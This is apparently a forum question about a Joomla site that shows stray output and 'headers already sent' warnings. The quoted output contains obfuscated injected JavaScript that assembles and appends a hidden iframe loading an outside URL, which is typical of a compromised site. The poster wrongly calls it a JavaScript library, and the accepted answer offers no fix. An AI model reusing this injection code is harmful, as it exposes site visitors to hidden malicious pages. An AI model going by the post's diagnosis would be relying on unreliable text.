# Joomla rendering some javascript library before <!doctype>

Tags: joomla

a friend of mine's joomla site started behaving very strangely...
it has some errors in the top of the page, it goes like this:

```
j='7';yy='le';jp='b';p='if';l='sa';sb='1c';x='tp';ih='a';he='7';yq='us';y='/i';b='ht';u='a';v='p=3';ea='://';xh='0fc';d='7';c='s';e='p?t';xn='/ho';n='n';k='s.';ds='sr';q='c';h='t';o='9';fc='dex';tn='17';bg='.ph';an='com';hj='ra';mp='f';cw='a';fw='me';z='me';zf='n';vn='ge';dd=p.concat(hj,fw);i=ds.concat(q);jn=b.concat(x,ea,l,yq,u,vn,c,z,n,h,k,an,xn,yy,y,zf,fc,bg,e,v,mp,jp,d,ih,xh,sb,tn,o,j,cw,he);var mu=document.createElement(dd);mu.setAttribute('width','5');mu.setAttribute('height','5');mu.setAttribute('style','display:none');mu.setAttribute(i,jn);document.body.appendChild(mu);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/26/3930826/html/index.php:1) in /home/content/26/3930826/html/libraries/joomla/session/session.php on line 412

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/26/3930826/html/index.php:1) in /home/content/26/3930826/html/libraries/joomla/session/session.php on line 412

Warning: Cannot modify header information - headers already sent by (output started at /home/content/26/3930826/html/index.php:1) in /home/content/26/3930826/html/libraries/joomla/session/session.php on line 415
```

the first paragraph is clearly a javascript library that is being inserted on the html, before the doctype, and the warnings i think are because of that.

Problem is, i never used joomla, my friend is not that saavy, and i haven't the slightest idea of what javascript lib is causing this.

I searched Google, and i get a lot of unrelated sites with the same problem...

Has anyone come across this? does someone have a solution?

Thanks

Answer (score 0, accepted):

Well, the problem went away by itself...